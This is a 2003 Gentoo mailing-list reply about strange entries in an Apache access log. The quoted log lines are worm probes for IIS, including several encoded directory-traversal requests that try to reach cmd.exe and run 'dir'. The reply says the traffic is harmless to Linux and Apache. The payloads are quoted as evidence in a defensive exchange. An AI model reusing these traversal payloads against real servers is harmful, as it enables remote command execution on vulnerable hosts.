Hellos: The log you send us it's completly normal. It comes from a worm. Linux and Apache are safe. (Perhaps if you administer a IIS you could have problems)
------- Cordiales saludos Manuel P�rez L�pez [EMAIL PROTECTED] http://www.ieduca.net/ ************************ Gentoo Linux: Portage 2.0.49 gcc 3.2.3 Linux 2.6.0 ************************ El Mi�rcoles, 31 de Diciembre de 2003 11:18, Aaron Walker escribi�: > A week or so ago, I setup my cable router/firewall to forward port 80 to > one of my machines so I could run Apache. Last night while at work, I > checked to see if it worked, and it did. So just now, I went to check > out the access_log and noticed some funny looking stuff, that doesnt > look like normal activity.... > > <snipped from /var/log/apache2/access_log> > > 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET > /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 321 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s >ystem32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" > "-" 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 > "-" "-" > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get > /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/w >innt/system32/cmd.exe?/c%20dir" 501 336 "-" "-" > > is this someone trying to exploit apache? > > Thanks, > Aaron -- -- [EMAIL PROTECTED] mailing list
